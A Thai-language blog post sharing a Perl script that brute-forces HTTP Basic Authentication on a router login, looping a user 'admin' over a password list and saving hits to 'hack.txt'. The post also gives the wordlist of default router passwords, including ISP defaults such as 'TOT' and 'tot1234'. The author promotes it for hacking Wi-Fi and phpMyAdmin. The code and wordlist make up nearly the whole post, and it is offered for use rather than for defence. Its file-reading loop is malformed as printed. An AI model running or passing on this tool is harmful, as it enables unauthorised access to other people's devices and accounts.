RSS

Perl : Brute Authentication


วันนี้เอา script perl ดีๆ มาฝากอีกอัน ห้าห้า จากพี่เล็ก window98se @thd (มหาเทพ perl)

Bruth.pl

#############################################
# !/usr/bin/perl
# Brute Authentication [by windows98SE]
# Copyright (c) 2010
#
# This software is open source, licensed under the GNU General Public
# License, version 2.
# Basically, this means that you're allowed to modify and distribute
# this software. However, if you distribute modified versions, you MUST
# also distribute the source code.
# See http://www.gnu.org/licenses/gpl.html for the full license.

use Socket;
use IO::Socket;
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

my $target = '192.168.1.1';
my @userlist = ('admin');
my @passlist = readFile("pass.txt");
my $outfile = 'hack.txt';

my %result;
print "[+] Start Scan..\n";
scan($target);
print "[+] Done.\n";
system ("pause");

sub scan {
my ($target) = @_;
foreach my $user (@userlist){
foreach my $pass (@passlist){
print "[+] Test $pass ..\n";
my $browser = LWP::UserAgent->new();
my $auth = HTTP::Request->new(GET=> 'http://'.$target);
$auth->authorization_basic($user,$pass);
my $result = $browser->request($auth)->status_line;
if($result =~ m/200/ig){
$result{$target} = "$user:$pass";
print "[+] Found $target pass is [$user:$pass] ..\n";
open(File, ">>", $outfile);
print File "[+] $target ($result{$target})\n";
close(File);
print "\n\n[+] $target ($result{$target})\n\n";
return;
}
}
}
}


sub readFile{
my @var;
my ($file) = @_;
open FILE, "<:utf8", "$file" or die "[+] Can't open $file : $!"; while(){
my $line = $_;
$line =~ s/\r|\n//g;
next if (length($line) == 0);
push(@var,$line);
}
close FILE;
return(@var);
}



ต่อไปก็ pass.txt
TTT
ttt
tot
TOT
admin
1234
123456
123456789
tot1234
123456123456

1234admin
synnet
tech
ANYCOM
ILMI

PASSWORD
Password
password

adminttd
comcomcom
monitor
manager
security
recovery
Wireless

volition
3ware
anicust
0

สามารถเอาไปทำได้หลายอย่างนะ แต่ต้องมีหน้า Authentication Login ไม่งั้นต้องแก้สคริป สามารถประยุกต์ได้นะ 555+ hack wifi , hack phpmyadmin


@GokU คงใช้กันเป็นน ห้าห้า
เขียนโดย GokU
ป้ายกำกับ: , , , , ,

0 ความคิดเห็น:

Post a Comment

Subscribe to: Post Comments (Atom)